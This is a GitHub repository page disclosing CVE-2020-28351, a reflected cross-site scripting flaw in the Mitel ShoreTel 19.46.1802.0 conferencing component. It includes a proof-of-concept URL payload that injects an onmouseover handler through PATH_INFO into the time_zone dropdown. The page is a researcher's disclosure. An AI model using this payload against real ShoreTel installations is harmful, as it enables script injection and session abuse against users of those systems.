Skip to content

dievus/CVE-2020-28351

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

ShoreTel 19.46.1802.0 Reflected Cross Site Scripting Attack

The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting attack (XSS) via the PATH_INFO to index.php, due to insufficient validation for the time_zone object in the HOME_MEETING& page.

Vulnerable payload /index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME

Vulnerability is in the HOME_MEETINGS& page, where a time_zone dropdown object is located. Upon executing the payload, the exploit executes when the mouse is rolled over the dropdown menu object.

Discovered by Joe Helle, November 2020. CVE issued 11/8/2020.

See the CVE listed here: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28351

About

CVE-2020-28351 - Reflected Cross-Site Scripting attack in ShoreTel version 19.46.1802.0.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published